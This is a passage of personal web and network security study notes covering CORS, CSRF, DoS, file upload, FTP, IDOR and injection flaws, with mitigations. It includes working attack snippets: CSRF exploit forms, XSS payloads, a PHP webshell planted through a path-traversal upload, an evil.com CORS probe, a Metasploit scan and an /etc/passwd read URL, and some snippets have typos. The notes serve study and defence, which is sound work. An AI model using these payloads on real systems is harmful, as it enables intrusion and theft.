zBusiness logic flaws enable an attacker to use legitimate transactions and flows of an application in a way that results in a negative behavior or outcome. Most common business logic problems are different from the typical security vulnerabilities in an application (such as XSS, CSRF, and SQL injection). A challenge with business logic flaws is that they can’t typically be found by using scanners or other similar tools.

The likelihood of business logic flaws being exploited by threat actors depends on many circumstances. However, such exploits can have serious consequences. Data validation and use of a detailed threat model can help prevent and mitigate the effects of business logic flaws. OWASP offers recommendations on how to test and protect against business logic attacks at https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/10-Business_Logic_Testing/01-Test_Business_Logic_Data_Validation.

MITRE has assigned Common Weakness Enumeration (CWE) ID 840 (CWE-840) to business logic errors. You can obtain detailed information about CWE-840 at https://cwe.mitre.org/data/definitions/840.html. That website also provides several granular examples of business logic flaws including the following:

Unverified ownership
Authentication bypass using an alternate path or channel
Authorization bypass through user-controlled key
Weak password recovery mechanism for forgotten password
Incorrect ownership assignment
Allocation of resources without limits or throttling
Premature release of resource during expected lifetime
Improper enforcement of a single, unique action
Improper enforcement of a behavioral workflow

https://portswigger.net/web-security/all-labs#business-logic-vulnerabilities

[Vault: Vulns & Attacks] Clickjacking & Cookie Manipulation Attacks

Thu, 09 Oct 2025 10:02:49 GMT

Clickjacking

Clickjacking involves using multiple transparent or opaque layers to induce a user into clicking on a web button or link on a page that he or she was not intended to navigate or click. Clickjacking attacks are often referred to as UI redress attacks. User keystrokes can also be hijacked using clickjacking techniques. An attacker can launch a clickjacking attack by using a combination of CSS stylesheets, iframes, and text boxes to fool the user into entering information or clicking on links in an invisible frame that can be rendered from a site the attacker created.

According to OWASP, these are the two most common techniques for preventing and mitigating clickjacking:

Send directive response headers to the proper content security policy ([[CSP - Content Security Policy|CSP]]) frame ancestors to instruct the browser not to allow framing from other domains. (This replaces the older X-Frame-Options HTTP headers.)
Use defensive code in the application to make sure the current frame is the top-level window.

The OWASP Clickjacking Defense Cheat Sheet provides additional details about how to defend against clickjacking attacks. The cheat sheet can be accessed at https://www.owasp.org/index.php/Clickjacking_Defense_Cheat_Sheet.

Cookie Manipulation Attacks

Cookie manipulation attacks are often referred to as stored DOM-based attacks (or vulnerabilities ). Cookie manipulation is possible when vulnerable applications store user input and then embed that input in a response within a part of the DOM. This input is later processed in an unsafe manner by a client-side script. An attacker can use a JavaScript string (or other scripts) to trigger the DOM-based vulnerability. Such scripts can write controllable data into the value of a cookie.

An attacker can take advantage of stored DOM-based vulnerabilities to create a URL that sets an arbitrary value in a user’s cookie.

NOTE The impact of a stored DOM-based vulnerability depends on the role that the cookie plays within the application.

TIP A best practice for avoiding cookie manipulation attacks is to avoid dynamically writing to cookies using data originating from untrusted sources.

[Vault: Vulns & Attacks] CORS Vulnerabilities

Thu, 09 Oct 2025 10:02:49 GMT

What is CORS?

CORS (Cross-Origin Resource Sharing) is a browser security feature that restricts web applications from making requests to a domain different from the one that served the web page, unless explicitly allowed by the server using CORS headers (e.g., Access-Control-Allow-Origin).

Why Does CORS Exist?

To prevent malicious websites from reading sensitive data from another site using the browser's credentials (like cookies or tokens). Without CORS, any site could make requests to another and read responses, leading to data theft, account takeover, or CSRF-like attacks.

CORS Headers Explained

| Header | Purpose | | ---------------------------------- | ----------------------------------------------- | | Access-Control-Allow-Origin | Specifies which origin can access the resource. | | Access-Control-Allow-Methods | Lists allowed HTTP methods (e.g., GET, POST). | | Access-Control-Allow-Headers | Lists allowed request headers. | | Access-Control-Allow-Credentials | Allows cookies/auth headers. Must be true. | | Access-Control-Max-Age | Caches the preflight response. |

Common CORS Misconfigurations

1. **Wildcard `*` with Credentials**

Issue: Access-Control-Allow-Origin: * and Access-Control-Allow-Credentials: true together.
Impact: This violates the CORS specification. Browsers should block it, but misconfigured servers might still behave unexpectedly.
Risk: If allowed, it enables an attacker to make authenticated cross-origin requests.

2. Reflecting Origin Header

Issue: Server blindly reflects the value of Origin in Access-Control-Allow-Origin.

Origin: https://evil.com
Access-Control-Allow-Origin: https://evil.com

Impact: An attacker can abuse this to access sensitive data using a malicious domain.

3. Whitelisted Subdomains with Wildcards

Issue: Using wildcard subdomains like *.victim.com allows attacker-controlled subdomains.
Impact: If the attacker can host content on evil.victim.com, they can bypass origin restrictions.

4. Overly Permissive Headers

Headers like:

 Access-Control-Allow-Origin: *
 Access-Control-Allow-Methods: GET, POST, PUT, DELETE
 Access-Control-Allow-Headers: *

These make the API broadly accessible and could lead to data exposure or abuse.

How to Test for CORS Vulnerabilities

1. Using curl or Burp Suite

Example: curl

curl -i -H "Origin: https://evil.com" https://target.com/api/data

Check if Access-Control-Allow-Origin: https://evil.com is reflected in the response.

2. Using a Simple JavaScript Payload

Run this in the browser console or embed it in an attacker’s site:

fetch("https://target.com/api/secret", {
  method: "GET",
  credentials: "include"
}).then(res => res.text())
  .then(data => console.log(data));

If the response succeeds and returns sensitive information, CORS is misconfigured.

3. Tools

CORScanner: Automated CORS misconfiguration scanner
Burp Suite’s CORS plugin
Postman: For manual testing with different headers

Example Scenario

A banking API has the following response:

Access-Control-Allow-Origin: https://evil.com
Access-Control-Allow-Credentials: true

Attacker tricks a logged-in user into visiting evil.com.
Malicious JS sends a request to https://bank.com/account/balance.
Because cookies are sent (credentials: include), the server treats it as authenticated and responds with data visible to the attacker.

Note

When dealing with CORS (Cross-Origin Resource Sharing) issues, it's important to note that not all browsers handle CORS requests the same way. For CORS to function correctly, browsers must support third-party cookies, which are being phased out due to privacy concerns.

Third-party cookies are used when a website (Website A) makes a request to another website (Website B). The cookies from Website B are sent along with the request. For these cookies to be sent, the original website must set the cookie with specific attributes: it must be secure (only sent over HTTPS), httponly (not accessible via JavaScript), and have the samesite policy set to None.

[Vault: Vulns & Attacks] CSRF

Thu, 09 Oct 2025 10:02:49 GMT

A Cross-Site Request Forgery (CSRF) vulnerability allows an attacker to unknowingly perform state changes on a web application where the victim is authenticated. CSRF does not allow theft of any data, since the attacker has no way to see the response from the webpage. CSRF takes advantage of the trust a web application has in the user’s browser.

CSRF attacks typically affect applications (or websites) that rely on a user’s identity. Attackers can trick the user’s browser into sending HTTP requests to a target website. An example of a CSRF attack is a user authenticated by the application through a cookie saved in the browser unwittingly sending an HTTP request to a site that trusts the user, subsequently triggering an unwanted action.

How CSRF Works:

User logs in to a trusted website (e.g., bank.com) and receives a session cookie.
Without logging out, the user visits a malicious site crafted by an attacker.
That site sends a request (like a money transfer) to bank.com, using the user’s browser and session cookie.
bank.com thinks the request is legitimate because it includes a valid session.

How to Prevent CSRF:

CSRF Tokens:
- Generate a unique token per session or request.
- Include it in forms or headers.
- Server validates the token before processing the request.
SameSite Cookies:
- Prevents cookies from being sent with cross-site requests. Types:
- SameSite=Lax: Sends cookies on top-level navigations and GETs.
- SameSite=Strict: Sends cookies only from the same site.
- SameSite=None; Secure: Sends cookies in all contexts but requires HTTPS.
Check Referer/Origin Headers:
- Only accept requests with trusted Origin or Referer headers.
Use of Authorization Headers (Tokens)
- For APIs: Instead of using cookies, authenticate via Authorization: Bearer <token>. (eg: by using JWTs)

Exploit

No CSRF token

`GET https://cryptosite.com/buy.php?wallet=something&amount=100&type=BTC`
Exploit:
An Image tag: `<img/src="http://cryptosite.com/buy.php?wallet=something&amount=100&type=BTC">`
A Hyperlink: `<a/href="http:cryptosite.com/buy.php?wallet=something&amount=100type=BTC>FREE BTC</a> ;`

Examples:

GET request action (Update notification pref) host a file (preferably in a https server) having malicious action, like: & invoke it from there

<form method="get" action="domain.com/notifications" target="frm">
	<input type=hidden name="enabled" value="true">
	<input type=submit value="send">
</form>
 OR	
`<a href=https://domain.com/notifications?enabled=false">`

POST request (Change email)

<form method="POST" action="domain.com/email" >
	<input type=hidden name="email" value="newemail@domain.com">
	<input type=submit value="send">
</form>

With CSRF token

Reusable / guessable CSRF token

POST http://cryptosite.com/buy.php HTTP/1.1
wallet=1337hacker&amount=100&type=BTC&xsrf_token=e3VzZXJfaWQSNDRS

Exploit

	<form action="http://cryptosite.com/buy.php" method="P0ST">
	<input type="hidden" name="wallet" value="1337hacker"/>
	<input type="hidden" name="amount" value="100"/>
	<input type="hidden" name="type" value="BTC"/>
	<input type="hidden" name="xsrf_token" value="e3VzZXJfaW(INDRS"/>
	<input type="submit" value="Click here to win"/> </form>
	
	e3VzZXJfaW(QINDRS = {user_id=44} base64 encoded

Try removing the CSRF token parameter, or token value Example:
POST request (change password)

POST website.com /password HTTP/1.1
...
csrf=eyJkYXRhIjp7InVzZXIiOiJiZW4iLCJyYW5kb20iOiJlZWQ4MjA3YzI0YzZkMDYxNWEyMGVjZjAwZDBiYjA0ZiJ9LCJzaWduYXR1cmUiOiI1YzI0ZDdhYjFkOTgwM2U2ZWY4MDVmNzRmOTk4NmMxYSJ9&password=12345678

here the token is {"data":{"user":"ben","random":"eed8207c24c6d0615a20ecf00d0bb04f"},"signature":"5c24d7ab1d9803e6ef805f74f9986c1a"}

We can also chain CSRF with XSS Assume there is a post form to change name

POST https://website.com /post/
...
name=adam

We can add an XSS payload to the name field in the post request

<html> 
<body> 
	<form action="https://website.com/post/" method="POST"> 
		<input type="hidden" name="name" value='0000000"><U>test123<script>alert()</script>'> 
		<input type="submit" value="Submit"> 
	</form> 
</body> 
</html>

CSRF mitigations

CSRF mitigations and defenses are implemented on the server side. The paper located at the following link describes several techniques to prevent or mitigate CSRF vulnerabilities: https://seclab.stanford.edu/websec/csrf/csrf.pdf.

[Vault: Vulns & Attacks] DHCP Attacks

Thu, 09 Oct 2025 10:02:49 GMT

DHCP Starvation Attacks and Rogue DHCP Servers

Most organizations run DHCP servers. The two most popular attacks against DHCP servers and infrastructure are DHCP starvation and DHCP spoofing (which involves rogue DHCP servers). In a DHCP starvation attack, an attacker broadcasts a large number of DHCP REQUEST messages with spoofed source MAC addresses.

If the DHCP server responds to all these fake DHCP REQUEST messages, available IP addresses in the DHCP server scope are depleted within a few minutes or seconds. After the available number of IP addresses in the DHCP server is depleted, the attacker can then set up a rogue DHCP server and respond to new DHCP requests from network DHCP clients. Then the attacker can set the IP address of the default gateway and DNS server to itself so that it can intercept the traffic from the network hosts.

A tool called Yersenia can be used to create a rogue DHCP server and launch DHCP starvation and spoofing attacks.

You have setup a rogue DHCP server. A rogue DHCP server is a server that network administration does not control and is unaware of. It offers users host, default gateway, and DNS server addresses when their DHCP settings renew. By setting the default gateway IP address to its own address in the DHCP offers that it sends out, the rogue server can receive all the traffic that clients send to non-local networks. It can also barrage the real DHCP server with spoofed DHCP discover messages. The attacker can thereby use the server to launch DoS (DHCP starvation) and MITM (DHCP spoofing) attacks.

[Vault: Vulns & Attacks] DNS Exploits

Thu, 09 Oct 2025 10:02:49 GMT

DNS Cache Poisoning

DNS cache poisoning involves the manipulation of the DNS resolver cache through the injection of corrupted DNS data. This is done to force the DNS server to send the wrong IP address to the victim and redirect the victim to the attacker’s system.

eg:

Step 1. The attacker corrupts the data of the DNS server cache to impersonate the website. Before the attacker executes the DNS poisoning attack, the DNS server successfully resolves the IP address of the website to the correct address.
Step 2. After the attacker executes the DNS poisoning attack, the DNS server resolves the website to the IP address of the attacker’s system.
Step 3. The victim sends a request to the DNS server to obtain the IP address of the domain the website.
Step 4. The DNS server replies with the IP address of the attacker’s system.
Step 5. The victim sends an HTTP GET to the attacker’s system, and the attacker impersonates the domain

TIP You can configure DNS servers to rely as little as possible on trust relationships with other DNS servers in order to mitigate DNS cache poisoning attacks. DNS servers using BIND 9.5.0 and higher provide features that help prevent DNS cache poisoning attacks. These features include the randomization of ports and provision of cryptographically secure DNS transaction identifiers. In order to protect against DNS cache poisoning attacks, you can also limit recursive DNS queries, store only data related to the requested domain, and restrict query responses to provide information only about the requested domain. In addition, Domain Name System Security Extensions (DNSSEC), a technology developed by the Internet Engineering Task Force (IETF), provides secure DNS data authentication and provides protection against DNS cache poisoning.

[Vault: Vulns & Attacks] DoS and DDoS Attacks

Thu, 09 Oct 2025 10:02:49 GMT

Denial of Service

A denial of service attack is an attack that targets a network or server and floods it with network traffic. The objective of a denial of service attack, or a DoS attack, is to disrupt normal business operations by overloading an organization's network. Denial-of-Service (DoS) attacks are a type of network attack that is relatively simple to carry out, even by an unskilled attacker. A DoS attack results in some sort of interruption of network service to users, devices or applications. 2 types of DOS attacks:

Overwhelming quantity of traffic

This is when a network, host or application is sent an enormous amount of data at a rate which it cannot handle. This causes a slowdown in transmission or response, or the device or service to crash.

Maliciously formatted packets

A packet is a collection of data that flows between a source and a receiver computer or application over a network, such as the Internet. When a maliciously formatted packet is sent, the receiver will be unable to handle it. For example, if an attacker forwards packets containing errors or improperly formatted packets that cannot be identified by an application, this will cause the receiving device to run very slowly or crash.

Direct DoS Attacks

A direct DoS attack occurs when the source of the attack generates the packets, regardless of protocol, application, and so on, that are sent directly to the victim of the attack. The attacker launches a direct DoS attack to a web server (the victim) by sending numerous TCP SYN packets. This type of attack is aimed at flooding the victim with an overwhelming number of packets in order to oversaturate its connection bandwidth or deplete the target’s system resources. This type of attack is also known as a SYN flood attack.

Cybercriminals can also use DoS and DDoS attacks to produce added costs for the victim when the victim is using cloud services. In most cases, when you use a cloud service such as Amazon Web Services (AWS), Microsoft Azure, or Digital Ocean, you pay per usage. Attackers can launch DDoS attacks to cause you to pay more for usage and resources.

Another type of DoS attack involves exploiting vulnerabilities such as buffer overflows to cause a server or even a network infrastructure device to crash, subsequently causing a DoS condition.

Distributed DoS

A distributed denial of service attack, or DDoS, is a kind of DoS attack that uses multiple devices or servers in different locations to flood the target network with unwanted traffic. Use of numerous devices makes it more likely that the total amount of traffic sent will overwhelm the target server. For example:

An attacker builds a network (botnet) of infected hosts called zombies, which are controlled by handler systems.
The zombie computers will constantly scan and infect more hosts, creating more and more zombies.
When ready, the hacker will instruct the handler systems to make the botnet of zombies carry out a DDoS attack.

Botnet

A bot computer is typically infected by visiting an unsafe website or opening an infected email attachment or infected media file. A botnet is a collection of such compromised machines (bots) connected through the Internet, that can be controlled by a malicious individual or group to participate in a DDoS attack, send spam emails, and perform other illicit activities. It can have tens of thousands, or even hundreds of thousands, of bots that are typically controlled through a command and control server. These bots can be activated to distribute malware, launch DDoS attacks, distribute spam email, or execute brute-force password attacks. Cybercriminals will often rent out botnets to third parties for nefarious purposes.

Reflected DoS and DDoS Attacks

With reflected DoS and DDoS attacks, attackers send to sources spoofed packets that appear to be from the victim, and then the sources become unwitting participants in the reflected attack by sending the response traffic back to the intended victim. UDP is often used as the transport mechanism in such attacks because it is more easily spoofed due to the lack of a three-way handshake. For example, if the attacker decides he wants to attack a victim, he can send packets (for example, Network Time Protocol [NTP] requests) to a source that thinks these packets are legitimate. The source then responds to the NTP requests by sending the responses to the victim, who was not expecting these NTP packets from the source.

Amplification DDoS Attacks

An amplification attack is a form of reflected DoS attack in which the response traffic (sent by the unwitting participant) is made up of packets that are much larger than those that were initially sent by the attacker (spoofing the victim). An example of this type of attack is an attacker sending DNS queries to a DNS server configured as an open resolver. Then the DNS server (open resolver) replies with responses much larger in packet size than the initial query packets. The end result is that the victim’s machine gets flooded by large packets for which it never actually issued queries.

3 common network level DoS attacks.

A SYN flood attack is a type of DoS attack that simulates the TCP connection and floods the server with SYN packets. The first step in the handshake is for the device to send a SYN, or synchronize, request to the server. Then, the server responds with a SYN/ACK packet to acknowledge the receipt of the device's request and leaves a port open for the final step of the handshake. Once the server receives the final ACK packet from the device, a TCP connection is established. Malicious actors can take advantage of the protocol by flooding a server with SYN packet requests for the first part of the handshake. But if the number of SYN requests is larger than the number of available ports on the server, then the server will be overwhelmed and become unable to function.

An ICMP flood attack is a type of DoS attack performed by an attacker repeatedly sending ICMP packets to a network server. This forces the server to send an ICMP packet. This eventually uses up all the bandwidth for incoming and outgoing traffic and causes the server to crash.

A ping of death attack is a type of DoS attack that is caused when a hacker pings a system by sending it an oversized ICMP packet that is bigger than 64 kilobytes, the maximum size for a correctly formed ICMP packet. Pinging a vulnerable network server with an oversized ICMP packet will overload the system and cause it to crash.

[Vault: Vulns & Attacks] File Upload Vulnerabilities

Thu, 09 Oct 2025 10:02:49 GMT

Uploaded files represent a significant risk to applications. The first step in many attacks is to get some code to the system to be attacked. Then the attack only needs to find a way to get the code executed. Using a file upload helps the attacker accomplish the first step. The consequences of unrestricted file upload can vary, including complete system takeover, an overloaded file system or database, forwarding attacks to back-end systems, client-side attacks, or simple defacement. It depends on what the application does with the uploaded file and especially where it is stored.

Upload a webshell and gain Remote Command Execution (RCE)
RCE or Cross-Site Scripting via file name
XSS via file upload
Path Traversal with the ability to overwrite local files
XXE if docx, pptx, xlsx, xml or similar files are allowed

The most important fields to focus on are:

[[Content Type]]
filename
file extension
the data that is sent

![[attachments/File-Upload-Vulnerabilities-img-202507170953.png]] ![[attachments/File-Upload-Vulnerabilities-img-202507170954.png]] ![[attachments/File-Upload-Vulnerabilities-img-202507170954-3.png]] XSS![[attachments/File-Upload-Vulnerabilities-img-202507170954-4.png]] ![[attachments/File-Upload-Vulnerabilities-img-202507170954-5.png]] Path traversal![[attachments/File-Upload-Vulnerabilities-img-202507170955.png]]

xml: <x:script xmlns:x="http://www.w3.org/1999/xhtml">alert(document.domain)</x:script>

exploiting svg uploads set content-type as image/svg+xml2 payload

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert(document.domain);
</script>
</svg>

extracting info by path traversing you can upload any files including php but php is disabled in the uploads directory. Set filename on upload to ../shell.php and this will upload to the webroot, upload a webshell here: File Contents: <?php echo shell_exec($_GET["cmd"]); ?> give url params /shell.php?cmd=ls

https://github.com/BlackFan/content-type-research zipslip : https://www.youtube.com/watch?v=q0S_NRq6BVc

[Vault: Vulns & Attacks] FTP Exploits

Thu, 09 Oct 2025 10:02:49 GMT

Attackers often abuse FTP servers to steal information. The legacy FTP protocol doesn’t use encryption or perform any kind of integrity validation. Recommended practice dictates that you implement a more secure alternative, such as File Transfer Protocol Secure (FTPS) or Secure File Transfer Protocol (SFTP).

The SFTP and FTPS protocols use encryption to protect data; however, some implementations – such as Blowfish and DES – offer weak encryption ciphers (encryption algorithms). You should use stronger algorithms, such as AES. Similarly, SFTP and FTPS servers use hashing algorithms to verify the integrity of file transmission. SFTP uses SSH, and FTPS uses FTP over TLS. Best practice calls for disabling weak hashing protocols such as MD5 or SHA-1 and using stronger algorithms in the SHA-2 family (such as SHA-2 or SHA-512).

In addition, FTP servers often enable anonymous user authentication, which an attacker may abuse to store unwanted files in your server, potentially for exfiltration. For example, an attacker who compromises a system and extracts sensitive information can store that information (as a stepping stone) to any FTP server that may be available and allows any user to connect using the anonymous account.

Using [[Nmap]] to Scan an FTP Server: nmap -sV 172.16.20.136 To test for anonymous login in an FTP server by using [[Metasploit]]:

msf > use auxiliary/scanner/ftp/anonymous
msf auxiliary(scanner/ftp/anonymous) > set RHOSTS 172.16.20.136
RHOSTS => 172.16.20.136
msf auxiliary(scanner/ftp/anonymous) > exploit

[+] 172.16.20.136:21 - 172.16.20.136:21 - Anonymous READ (220  vsFTPd 3.0.3))
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Here it shows that the FTP server is configured for anonymous login. The mitigation in this example is to edit the FTP server configuration file to disable anonymous login. In this example, the server is using vsFTPd, and thus the configuration file is located at /etc/vsftpd.conf.

Best practices for mitigating FTP server abuse and attacks:

Use strong passwords and multifactor authentication. A best practice is to use good credential management and strong passwords. When possible, use two-factor authentication for any critical service or server.
Implement file and folder security, making sure that users have access to only the files they are entitled to access.
Use encryption at rest – that is, encrypt all files stored in the FTP server.
Lock down administration accounts. You should restrict administrator privileges to a limited number of users and require them to use multifactor authentication. In addition, do not use common administrator usernames such as root or admin.
Keep the FTPS or SFTP server software up-to-date.
Use the U.S. government FIPS 140-2 validated encryption ciphers for general guidance on what encryption algorithms to use.
Keep any back-end databases on a different server than the FTP server.
Require re-authentication of inactive sessions.

[Vault: Vulns & Attacks] IDOR - Insecure direct object reference

Thu, 09 Oct 2025 10:02:49 GMT

Occurs when an application exposes internal object identifiers, like database keys or file paths, to users without proper access controls. This can happen when user input, like an account number, is directly linked to an application's object without any checking mechanism to stop unauthorized users from accessing it.

Insecure Direct Object Reference vulnerabilities can be exploited when web applications allow direct access to objects based on user input. Successful exploitation could allow attackers to bypass authorization and access resources that should be protected by the system (for example, database records, system files). This type of vulnerability occurs when an application does not sanitize user input and does not perform appropriate authorization checks.

IDOR comes under Broken Access Control in OWASP top10 2021 where it ranked #1 in terms of web application security risk.

Exploit

An attacker can take advantage of Insecure Direct Object References vulnerabilities by modifying the value of a parameter used to directly point to an object. In order to exploit this type of vulnerability, an attacker needs to map out all locations in the application where user input is used to reference objects directly.

Sometimes application use UUID's instead of numeric id's. UUID's are unpredictable long strings. They look like this: bfe5c6a8-9afa-11ea-bb37-0242ac130002. They don't protect against IDOR's but they do make it harder to exploit. Sometimes applications leak the UUID, on purpose or by accident. For example, when you visit another user's profile, they may have a profile photo that's stored on the website in a folder the same as their UUID: <img src="/assets/profile_picture/bfe5c6a8-9afa-11ea-bb37-0242ac130002/avatar.png">

Try different http methods

Mitigations

Mitigations for this type of vulnerability include input validation, the use of per-user or session Indirect Object References, and access control checks to make sure the user is authorized for the requested object.

[Vault: Vulns & Attacks] Injection Based vulnerabilities

Thu, 09 Oct 2025 10:02:49 GMT

[[SQLi]]

Command injection Vulnerabilities

A command injection is an attack in which an attacker tries to execute commands that he or she is not supposed to be able to execute on a system via a vulnerable application. Command injection attacks are possible when an application does not validate data supplied by the user (for example, data entered in web forms, cookies, HTTP headers, and other elements). The vulnerable system passes that data into a system shell. With command injection, an attacker tries to send operating system commands so that the application can execute them with the privileges of the vulnerable application.

Command injection is not the same as code execution and code injection, which involve exploiting a buffer overflow or similar vulnerability.

Lightweight Directory Access Protocol (LDAP) Injection Vulnerabilities

LDAP injection vulnerabilities are input validation vulnerabilities that an attacker uses to inject and execute queries to LDAP servers. A successful LDAP injection attack can allow an attacker to obtain valuable information for further attacks on databases and internal applications.

NOTE LDAP is an open application protocol that many organizations use to access and maintain directory services in a network. The LDAP protocol is defined in RFC 4511.

Similar to SQL injection and other injection attacks, LDAP injection attacks leverage vulnerabilities that occur when an application inserts unsanitized user input (that is, input that is not validated) directly into an LDAP statement. By sending crafted LDAP packets, attackers can cause the LDAP server to execute a variety of queries and other LDAP statements. LDAP injection vulnerabilities could, for example, allow an attacker to modify the LDAP tree and modify business-critical information.

There are two general types of LDAP injection attacks:

Authentication bypass: The most basic LDAP injection attacks are launched to bypass password and credential checking.
Information disclosure: An attacker could inject crafted LDAP packets to list all resources in an organization’s directory and perform reconnaissance.

[Vault: Vulns & Attacks] insecure Coding practises

Thu, 09 Oct 2025 10:02:49 GMT

Comments in Source Code

Often developers include information in source code that could provide too much information and might be leveraged by an attacker. For example, they might provide details about a system password, API credentials, or other sensitive information that an attacker could find and use.

CWE-615, “Information Exposure Through Comments,” - https://cwe.mitre.org/data/definitions/615.html.

Lack of Error Handling and Overly Verbose Error Handling

Improper error handling is a type of weakness and security malpractice that can provide information to an attacker to help him or her perform additional attacks on the targeted system. Error messages such as error codes, database dumps, and stack traces can provide valuable information to an attacker, such as information about potential flaws in the applications that could be further exploited.

A best practice is to handle error messages according to a well-thought-out scheme that provides a meaningful error message to the user, diagnostic information to developers and support staff, and no useful information to an attacker. TIP OWASP provides detailed examples of improper error handling at https://owasp.org/www-community/Improper_Error_Handling. OWASP also provides a cheat sheet that discusses how to find and prevent error handling vulnerabilities; see https://cheatsheetseries.owasp.org/cheatsheets/Error_Handling_Cheat_Sheet.html.

Hard-Coded Credentials

Hard-coded credentials are catastrophic flaws that an attacker can leverage to completely compromise an application or the underlying system. MITRE covers this malpractice (or weakness) in CWE-798. You can obtain detailed information about CWE-798 at https://cwe.mitre.org/data/definitions/798.html.

Race Conditions

A race condition occurs when a system or an application attempts to perform two or more operations at the same time. However, due to the nature of such a system or application, the operations must be done in the proper sequence in order to be done correctly. When an attacker exploits such a vulnerability, he or she has a small window of time between when a security control takes effect and when the attack is performed. The attack complexity in race conditions is very high. In other words, race conditions are very difficult to exploit.

NOTE Race conditions are also referred to as time of check to time of use (TOCTOU) attacks. An example of a race condition is a security management system pushing a configuration to a security device (such as a firewall or an intrusion prevention system) such that the process rebuilds access control lists and rules from the system. An attacker may have a very small time window in which it could bypass those security controls until they take effect on the managed device.

Unprotected APIs

Application programming interfaces (APIs) are used everywhere today. A large number of modern applications use APIs to allow other systems to interact with the application. Unfortunately, many APIs lack adequate controls and are difficult to monitor. The breadth and complexity of APIs also make it difficult to automate effective security testing. There are a few methods or technologies behind modern APIs:

Simple Object Access Protocol (SOAP): This standards-based web services access protocol was originally developed by Microsoft and has been used by numerous legacy applications for many years. SOAP exclusively uses XML to provide API services. XML-based specifications are governed by XML Schema Definition (XSD) documents. SOAP was originally created to replace older solutions such as the Distributed Component Object Model (DCOM) and Common Object Request Broker Architecture (CORBA). You can find the latest SOAP specifications at https://www.w3.org/TR/soap.
Representational State Transfer (REST): This API standard is easier to use than SOAP. It uses JSON instead of XML, and it uses standards such as Swagger and the OpenAPI Specification ( https://www.openapis.org ) for ease of documentation and to encourage adoption.
GraphQL: GraphQL is a query language for APIs that provides many developer tools. GraphQL is now used for many mobile applications and online dashboards. Many different languages support GraphQL. You can learn more about GraphQL at https://graphql.org/code.

NOTE SOAP and REST use the HTTP protocol. However, SOAP is limited to a more strict set of API messaging patterns than REST. As a best practice, you should always use Hypertext Transfer Protocol Secure (HTTPS), which is the secure version of HTTP. HTTPS uses encryption over the Transport Layer Security (TLS) protocol in order to protect sensitive data.

An API often provides a roadmap that describes the underlying implementation of an application. This roadmap can give penetration testers valuable clues about attack vectors they might otherwise overlook. API documentation can provide a great level of detail that can be very valuable to a penetration tester. API documentation can include the following:

Swagger (OpenAPI): Swagger is a modern framework of API documentation and development that is the basis of the OpenAPI Specification (OAS). Additional information about Swagger can be obtained at https://swagger.io. The OAS specification is available at https://github.com/OAI/OpenAPI-Specification.
Web Services Description Language (WSDL) documents: WSDL is an XML-based language that is used to document the functionality of a web service. The WSDL specification can be accessed at https://www.w3.org/TR/wsdl20-primer.
Web Application Description Language (WADL) documents: WADL is an XML-based language for describing web applications. The WADL specification can be obtained from https://www.w3.org/Submission/wadl.

When performing pen testing against an API, it is important to collect full requests by using a proxy such as Burp Suite or OWASP ZAP. It is important to make sure that the proxy is able to collect full API requests and not just URLs because REST, SOAP, and other API services use more than just GET parameters.

When you are analyzing the collected requests, look for nonstandard parameters and for abnormal HTTP headers. You should also determine whether a URL segment has a repeating pattern across other URLs. These patterns can include a number or an ID, dates, and other valuable information. Inspect the results and look for structured parameter values in JSON, XML, or even nonstandard structures.

You can also use fuzzing to find API vulnerabilities (or vulnerabilities in any application or system). According to OWASP, “Fuzz testing or Fuzzing is an unknown environment/black box software testing technique, which basically consists in finding implementation bugs using malformed/semi-malformed data injection in an automated fashion.” When testing APIs, you should always analyze the collected requests to optimize fuzzing. After you find potential parameters to fuzz, determine the valid and invalid values that you want to send to the application. Of course, fuzzing should focus on invalid values (for example, sending a GET or PUT with large values or special characters, Unicode, and so on).

NOTE OWASP has a REST Security Cheat Sheet that provides numerous best practices on how to secure RESTful (REST) APIs. See https://cheatsheetseries.owasp.org/cheatsheets/REST_Security_Cheat_Sheet.html.

The following are several general best practices and recommendations for securing APIs:

Secure API services to provide HTTPS endpoints with only a strong version of TLS.
Validate parameters in the application and sanitize incoming data from API clients.
Explicitly scan for common attack signatures; injection attacks often betray themselves by following common patterns.
Use strong authentication and authorization standards.
Use reputable and standard libraries to create the APIs.
Segment API implementation and API security into distinct tiers; doing so frees up the API developer to focus completely on the application domain.
Identify what data should be publicly available and what information is sensitive.
If possible, have a security expert do the API code verification.
Make internal API documentation mandatory.
Avoid discussing company API development (or any other application development) on public forums.

NOTE CWE-227, “API Abuse,” covers unsecured APIs. For detailed information about CWE-227, see https://cwe.mitre.org/data/definitions/227.html.

Hidden Elements

Web application parameter tampering attacks can be executed by manipulating parameters exchanged between the web client and the web server in order to modify application data. This could be achieved by manipulating cookies (as discussed earlier in this module) and by abusing hidden form fields.

It might be possible to tamper with the values stored by a web application in hidden form fields. Let’s take a look at an example of a hidden HTML form field. Suppose that the following is part of an e-commerce site selling merchandise to online customers: <input type="" id="123" name="price" value="100.00"> In the hidden field shown in this example, an attacker could potentially edit the value information to reduce the price of an item. Not all hidden fields are bad; in some cases, they are useful for the application, and they can even be used to protect against CSRF attacks.

Lack of Code Signing

Code signing (or image signing) involves adding a digital signature to software and applications to verify that the application, operating system, or any software has not been modified since it was signed. Many applications are still not digitally signed today, which means attackers can easily modify and potentially impersonate legitimate applications.

Code signing is similar to the process used for SSL/TLS certificates. A key pair (one public key and one private key) identifies and authenticates the software engineer (developer) and his or her code. This is done by employing trusted certificate authorities (CAs). Developers sign their applications and libraries using their private key. If the software or library is modified after signing, the public key in a system will not be able to verify the authenticity of the developer’s private key signature. Subresource Integrity (SRI) is a security feature that allows you to provide a hash of a file fetch by a web browser (client). SRI verifies file integrity and ensures that files are delivered without any tampering or manipulation by an attacker.

[Vault: Vulns & Attacks] LFD, LFI and RFI

Thu, 09 Oct 2025 10:02:49 GMT

LFD – Local File Disclosure

A vulnerability that allows an attacker to read or access files stored locally on the server directly. LFD typically refers just to file reading, not execution or inclusion. eg: http://example.com/view?file=/etc/passwd

